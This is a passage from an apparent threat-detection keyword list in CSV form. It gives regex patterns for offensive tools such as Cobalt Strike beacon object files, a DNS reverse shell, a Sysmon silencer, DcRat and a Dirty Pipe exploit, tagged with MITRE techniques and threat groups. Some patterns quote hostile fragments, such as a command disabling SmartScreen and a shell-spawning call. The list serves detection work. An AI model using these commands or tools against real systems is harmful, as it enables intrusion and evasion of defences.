T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60746" "*syscalls_inject *",".{0,1000}syscalls_inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60747" "*syscalls_inject.*",".{0,1000}syscalls_inject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60748" "*syscalls_shinject *",".{0,1000}syscalls_shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60749" "*syscalls_shspawn *",".{0,1000}syscalls_shspawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60750" "*syscalls_spawn *",".{0,1000}syscalls_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60751" "*syscalls_spawn.*",".{0,1000}syscalls_spawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60752" "*syscallsapcspawn.x64*",".{0,1000}syscallsapcspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - 
Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60753" "*syscalls-asm.h*",".{0,1000}syscalls\-asm\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker 
- Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60754" "*syscallsdump.x64*",".{0,1000}syscallsdump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60755" 
"*syscallsinject.x64*",".{0,1000}syscallsinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60756" "*syscallsspawn.x64*",".{0,1000}syscallsspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 
- T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60757" "*syscallStuff.asm*",".{0,1000}syscallStuff\.asm.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","60758" "*sysdream/chashell*",".{0,1000}sysdream\/chashell.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. 
It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","60760" "*sysdream/ligolo*",".{0,1000}sysdream\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","60761" "*SYSKEY RESET!\nNow please set new administrator password!*",".{0,1000}SYSKEY\sRESET!\\nNow\splease\sset\snew\sadministrator\spassword!.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60762" "*Sysmon is being suffocated*",".{0,1000}Sysmon\sis\sbeing\ssuffocated.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60764" "*Sysmon is quiet now!*",".{0,1000}Sysmon\sis\squiet\snow!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","#content","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60765" 
"*sysmonquiet.*",".{0,1000}sysmonquiet\..{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60766" "*SysmonQuiet-main*",".{0,1000}SysmonQuiet\-main.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60767" "*SySS-Research/Seth*",".{0,1000}SySS\-Research\/Seth.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","60769" "*System' EnableSmartScreen 0 -Type Dword -Force -ea 0*",".{0,1000}System\'\sEnableSmartScreen\s0\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","60770" "*system rm -f /current/tmp/ftshell.latest*",".{0,1000}system\srm\s\-f\s\/current\/tmp\/ftshell\.latest.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data 
Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","60771" "*System token is copied to the current process. Executing cmd.exe..*",".{0,1000}System\stoken\sis\scopied\sto\sthe\scurrent\sprocess\.\sExecuting\scmd\.exe\.\..{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","60772" "*system(""/tmp/sh"")*",".{0,1000}system\(\""\/tmp\/sh\""\).{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","60773" "*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D",".{0,1000}System\.DirectoryServices\.AccountManagement\.GroupPrincipal.{0,1000}FindByIdentity.{0,1000}D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration - domain admins","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","60774" "*System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN*",".{0,1000}System\.IdentityModel\.Tokens\.KerberosRequestorSecurityToken\s\-ArgumentList\s\$UserSPN.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - 
